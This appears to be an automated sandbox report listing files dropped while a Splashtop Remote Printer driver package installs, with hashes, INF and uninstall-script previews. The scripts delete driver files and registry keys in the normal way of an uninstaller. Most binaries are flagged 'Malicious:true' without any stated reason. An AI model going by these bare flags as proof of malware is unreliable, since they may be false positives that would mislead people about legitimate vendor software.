                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$Windows NT$"..Provider=%splashtop%..ClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}..Class=Printer..DriverVer=04/19/2019,10.0.10012.16386..CatalogFile=stprinter.cat....[Manufacturer]..%splashtop%=Vendor,NTx86,NTamd64,NTx86.6.0,NTamd64.6.0....[Vendor.NTx86]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTamd64]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTx86.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[Vendor.NTamd64.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[INSTALL_XDSMPL_FILTERS_PRE_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..PrintProcessor="MS_XPS,filterpipelineprintproc.dll"..ConfigFile=UniDrvUI.dll..HelpFile=UniDrv.HLP..DataFile=XDSmpl.GPD..Include=NTPRINT.INF, MSXPSDRV.INF..Needs=UNIDRV.OEM, XPSGPD.OEM, XPSDRV.OEM....[INSTALL_XDSMPL_FILTERS_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..Confi
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2543
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.42985763446162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWaDqFNQ29ZNlV2MK712DJNzaMR1X2kKJzgSZwlQXV2MK71euV2MKc:QFQ4ShC66ZLq7UAq7zq7o
                                                                                                                                                                                                                                                                                                                                  MD5:C228BF417378FD98E4229A2BA3054CAE
                                                                                                                                                                                                                                                                                                                                  SHA1:175CCDA93EF8EDBFAB2F1BE507F64690FE5BECE9
                                                                                                                                                                                                                                                                                                                                  SHA-256:1DFD5E0AD2765E39A614EF56603A749C095DDC00E6F50079CDDDA8E18159E73B
                                                                                                                                                                                                                                                                                                                                  SHA-512:6F9D65AA46B702E55D34532A37B33993AD53AB305679768F419A74B8CE2EF8C494CC877606C3C663545111F1189CE4456798D465C1A5EB4F7B6708DEB2A6B719
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..utils\DIFxCmd.exe /u stprinter.inf >> inst.log..utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows NT x86\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\3\xdbook.dll"..del /F /Q "%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2513
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.408021383480619
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWkDqFNQ4ZNlV2MK71AynXV2MK71euV2MK7153w3uV:QFQ4SDC64ZLq7xq7zq7Z
                                                                                                                                                                                                                                                                                                                                  MD5:DB05A3CA2E7604DC2E29A922A4545075
                                                                                                                                                                                                                                                                                                                                  SHA1:0430C36BD56EAC3F65E0060CE91DC60E31F822C5
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E0BD257BFE859F462EEE9E0F1DC20768425F73C9E90B0F7F5EE450726FBB56F
                                                                                                                                                                                                                                                                                                                                  SHA-512:9FDD486F4F7F5D1ED3CBEF4A2246416F88643E27E76D79A433E5450D8790BA264C3219555A0CB57602BC2E3F884C1E1449EA0688D59355D68E23DBE9499F8B60
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..utils\DIFxCmd64.exe /u stprinter.inf >> inst.log..utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\x64\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows x64\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\x64\3\xdbook.dll"..del /F /Q "%WINDIR%
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):7680
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202360830491015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:6HbQ34Dthj/wKzGMdCprD4iZ7F+gUABoTndoIvJJGtVAm6XyC7tCEqqb:6Hs4thgNDZ7F+gvqdHvJJ4VR6XPnb
                                                                                                                                                                                                                                                                                                                                  MD5:B6CA717203EF9E8DD1205CAC5D3AF38F
                                                                                                                                                                                                                                                                                                                                  SHA1:818438149A92551042A5D2ABD9000DBE67D93C67
                                                                                                                                                                                                                                                                                                                                  SHA-256:66986A04FDEF120D7F18351648A8737979DFAA3CA82F6504B3EA14F45BEC130C
                                                                                                                                                                                                                                                                                                                                  SHA-512:99D21F55B7E754A2D6063BE9302874D757344893CB496F574C2DB7F124071C361894508BADF7137B17A572EF9792F7E3B3C21292250D76CD33B9863D52A300D6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5890891928333435
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:8JzsVxRROApObap+CPSxzqNJ3pvfsFMV2+/SRVxy8iK:8EOb5x2NxqFMaP
                                                                                                                                                                                                                                                                                                                                  MD5:D57E38A511B607A79307F6966D5F862A
                                                                                                                                                                                                                                                                                                                                  SHA1:7F66DC176D9BDE0715A9050CAD9BA91785F7B192
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF3A7B03F011CBAD96F503BF12BD151B97BAE1EACC700A7F352D175CCFDDB969
                                                                                                                                                                                                                                                                                                                                  SHA-512:72DF85067747090A20441F052796F5BCED00B4F8268568F14646A0C5A0CCD27DC87C9AFEEC689178F885CEDEE0636D61F238F36348F66E7D2EE940D09130C2C1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578816818366091
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:1yYZVBVmekQ5ncHc43wAmaxEJg3tNqYU51pQ8DfqXF7q9B24CvJ6BAQ:1y8Vf1uTHNqYUH+8GeMvJ4t
                                                                                                                                                                                                                                                                                                                                  MD5:DDBCBCED9CCBA27D296B680D04178B1D
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE1EF49678E4F9250B675DFE595DF1219DD7EF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:B23B42E24EAB4E2F1DD94711EEC741F94D39F5EBAF238820A0B9D464522C24D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B913058A50A4235925F208E9FA8740DDA1A070168285401FD9C9032C0CC782887F5D92A0D68796D7473E61EE8DDC1E863503C288CAD1F99C233A0DEDE37CB314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):156512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.590357914627137
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Wooboos//G/jWDiNza6LR07qZ2bzl409+E/PXwCSp6WKsAqHew+1l7nkrZg8iE:WooyFiJRmbzl4mZYYqHz+1l7ki8iE
                                                                                                                                                                                                                                                                                                                                  MD5:C892519FE8AE2163C1368579EEC134F3
                                                                                                                                                                                                                                                                                                                                  SHA1:D5C75AABEDAD20373E7CA40CAF5C986C850974BE
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8C8B0F1DB2CEA6FAB3EEE350143BC677DA3A1E4B246325852B8A0B94A4A77D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:7A2C0C78237E8528AD691D2F7377D33FFCCA06925359CAD0B787DF919A81EDDCB9296F1EE446BDE83CECF3520A070E72BE7956838BD1337987B422127121E093
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):169312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.584431984131001
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XizpEi8PNuoyZLy39r4BRyFr8Tjqe1LP+0hORTj8i0K:XUpX8FYFyB8T2oyREtK
                                                                                                                                                                                                                                                                                                                                  MD5:4FFADA79BA20A933429F72D3B8CF61D9
                                                                                                                                                                                                                                                                                                                                  SHA1:77E7346EF7E7A31A8000150B4B0E4B21CA3BF381
                                                                                                                                                                                                                                                                                                                                  SHA-256:0FF6DD54C4DC7368BD7BAEFFA8CBD294DB31AA318F8F0FBD9088C15B61EB8854
                                                                                                                                                                                                                                                                                                                                  SHA-512:839ABEBEF1A76D168043C8DDFB6B8DF958CA89C3DF602B5B538EB6398332E785C4B0359CB6DF557252BD1191BCAC5C1E1AED6942D2848B5C898BA2FC8EF8D0B7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):204128
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5795919533739005
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9w8wZDxspqPfbuSqQCoSz6/e1+1FiATl8i9:fw3owojmVW0
                                                                                                                                                                                                                                                                                                                                  MD5:B4AD99DFCCB67C77F6C8E142EE5AD5BA
                                                                                                                                                                                                                                                                                                                                  SHA1:D10B7BE8A5C339185B8E409D4C0BE2103230BAA0
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A280F84B70F41D90B122DBC8E8FCBDA414353CC5C87580FA30B3B51B7696207
                                                                                                                                                                                                                                                                                                                                  SHA-512:EEBC321D90737E161B452D6E27398D1CC1D4737DBE90F7FE5C407C1732178E30CD87228FB0C8B6C6F3B118DC7E46985D231F3059996452861BFCA1AD4A098077
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):254816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5058723884762335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kw+rqKMvEZF6VPvVpb1eTjLp8D3qkTmII9b9zC+l+smDP00IPWx2wUj8ii:kdrWgFEPNB+MPTHIWjP00IedH
                                                                                                                                                                                                                                                                                                                                  MD5:BB8D8CE6F052BE2BA3A39768528B88C6
                                                                                                                                                                                                                                                                                                                                  SHA1:0C2D48F22C7231C52C9FDDD35120E971ABA05EC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:B61BA88D2BB36A0A56F00C455BBC530703415F176B5715E9D24FAB82CC935140
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF3CED636733BCF45CE4E1D21D33F50945D6FFE2A5478A19D538A30C3071E5F78D539B0E3718EEAF404614EEE182E60AE3697E499C0D7EC769D272CD5B58CCA9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):248160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.1098745205591625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AG9NqQQHPItXExQNj+mB92u+CW5D37LnuHc45X0T5/uyFNJpfUarTtvU8il:f9AP2b+mBQVJLnYlETtug5jw
                                                                                                                                                                                                                                                                                                                                  MD5:62945189F63210AFE22EC07C93A323C2
                                                                                                                                                                                                                                                                                                                                  SHA1:ADEE11D641B6BC9E9F46B95388680D291C795A33
                                                                                                                                                                                                                                                                                                                                  SHA-256:DD36F7448202BB06C634DD18F911B830615B61E9849900C7DCD92B1157F2C671
                                                                                                                                                                                                                                                                                                                                  SHA-512:B62D7E7668F2E02330690D373EFB815FBBBD12E771FDB4EA46EDA8386AB8A969DB40158132F8C15ACA65C87CDF8920D46075055BB9B73DF42FD49777DF7EB6BD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):258400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.288592681682295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:I3LIl4XgsSVloTnPYdn7lJZRZ8QXqsJ3H+:IUlJVmgh5asJ3+
                                                                                                                                                                                                                                                                                                                                  MD5:372C4A2430E2BF3E0A3C0D51996ADEA5
                                                                                                                                                                                                                                                                                                                                  SHA1:F6F2F8D750D08BE940AE2B655804C106E9C7491D
                                                                                                                                                                                                                                                                                                                                  SHA-256:FE632C826ABA5F694DE6684506B72BDECBFD712E9DE2ACDDDE1F2C880EE2646B
                                                                                                                                                                                                                                                                                                                                  SHA-512:C017A180893D39463068DA5DF647D959603CEE7979CA420963FEF9D09309FCA0B744D7268DC2A0FC4AFCD41F912714CF14003CC9AC5FB6A033AA91962E9981C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):237008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.30179636306813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:B+2HsTNg3ex5PUwoEK2dvK7PnGxOkf9V3QhjTvI9Nle9owmPDXpUIJonb:BDHsT2qvoEKMAGxOkVJQhjTAEgY
                                                                                                                                                                                                                                                                                                                                  MD5:7DD3CA728E061F9C438209935DF41FD8
                                                                                                                                                                                                                                                                                                                                  SHA1:D291C17619FB2E9B8A4CF07B53A56DC60CFB4C8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:F19F300E4623E3B57F870D8E4B150F2E70D29E6CB47750671D53667BB0804202
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7D0AB0EB37F6B245B1EBDE46C2D9184AB801EB659E4F4ED7C2AFD07843A1646612290AD3C315EE9BF7FC1A9425B58E2A03810014DDBB621EB46B331AA2E753E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):178016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.354805848687379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:X0fRIF+SwIL9Bagg2mCEPToX/ITpu0uOpDSgb2WXa+qubG8iu:EfaCIJbglCe1Vu0uIDSlWtf
                                                                                                                                                                                                                                                                                                                                  MD5:D16039589730B0C6E6B5227C041FB1B4
                                                                                                                                                                                                                                                                                                                                  SHA1:F8F942DBB62CBC15F7ED0BE8750C9C564638FBF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:ACA0DF6F5EB1DE40506943B30BBDA614F886523C093F5C9A3587C3E1161F0DF0
                                                                                                                                                                                                                                                                                                                                  SHA-512:35ED0D4AD06E4979970CA2AD58B81735E50AAB755605216BB059EBE698B82F6C627F5F7E29ADC9FB3BC58C7EFB4E8ACA2B323F2E2813D4EA7EE39363DE0E1D64
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):196448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.349185940783631
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:lSUAV0AVZrAVOVrHYapV5Ddr1oxkg9gh0CBEACcodM5nY+WVFGoEM8ip:AvPb6OVrVNJ1ufqBEACjG/Y
                                                                                                                                                                                                                                                                                                                                  MD5:A88901EB863EC013B461A84DACB4C795
                                                                                                                                                                                                                                                                                                                                  SHA1:40303F44732A2C8DBEAF4EC13CD32FCED66D8F8A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FF295F8914F76DFE707455FE633BFC42B805BB4D3274C2290E1E5D56A383E969
                                                                                                                                                                                                                                                                                                                                  SHA-512:92BD7F2CE6DB83A744972503B4352ADC210FE10C0BDC026F953A925361365E95B79A4A1CEF3677266AE7178FAC24AA64A353115362E987F1DFD84BA38A6F9B25
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):253792
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319719994714089
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:NuctDSdRbMOiymM/Cufn5B+1jowgreeTwcV1:NqXMOFmA5VwgBEg1
                                                                                                                                                                                                                                                                                                                                  MD5:668A98269B12A2C17E39137AC8D7B716
                                                                                                                                                                                                                                                                                                                                  SHA1:E438E9031338158FE70B9D7821200DC4929380CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:200D323E0842ABC93E22F6D475928AB0DAC6AA9F3824CF8E729E8049852AC54A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E2E425489A084022AE23AF65D4869B24A247E3159DA5ED4E31B0CDB11C0BE30AF9EEA12ECF68F9C8269B60ECC1BB489F3EFDE00F4F8885AA2631EFAB3E54BCBC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):342368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.187004427741537
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:T7NLhV1jxjcVfgFf6QlJpYw4MxuiMRZI7CPdxV4eZ+PyRPP00I7Q:T71j1aVfgFiQ/ug/GMQ
                                                                                                                                                                                                                                                                                                                                  MD5:96BDC666BCD7D432D6C7D4170C8E6046
                                                                                                                                                                                                                                                                                                                                  SHA1:1B705A191731ECA3369435D9906C8275C5D326C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:DC4C32919B533A79D9EA76BDE59975DD149AA9C7B7278B076019C080A3A97C56
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDD9E42633F98A7E5F6F7E3E4571815F9D80EA16084B23A82DBE22E929FD6F0BD791EB3DFA7BB229D73D101C66077C99FE47A5CEAB1DF6917A6E4DF209853162
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):282464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.880530047125276
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:tj4c/JPjXOQTuGkfIpmWpnETJLnYlETtuwv:tj4cBbEZTTJDY+jv
                                                                                                                                                                                                                                                                                                                                  MD5:F26D954E0F23049CAA4F698934DB5371
                                                                                                                                                                                                                                                                                                                                  SHA1:B0FC39DFF9871778A767B95F0D1CD6E56F939071
                                                                                                                                                                                                                                                                                                                                  SHA-256:186500D4E31ADF5FA2DC02F112EDE6FCA86C1BC48731EA224CFE83C160ABD1CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF79667EC9E85FCC6214BB8B3352DCF4B43A042708F471C293B507574A446D938C4E5981C6E9FA4E81AF98A91B6A72CB678F06B91E064F3FCA48744DC0DFF94F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):870
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.164710229415834
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kcrGqwAcK/EyAZRVowyyAcK/E2kam0LYDeegidym0EZkBqq6JFpYpFSqq6JFrmp5:BrWWFwD7WR8mI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:50B0957220D10275274CAC025EAA6883
                                                                                                                                                                                                                                                                                                                                  SHA1:8F677ED1CD73A05F634AA06AD6BED1DA4C6BD80F
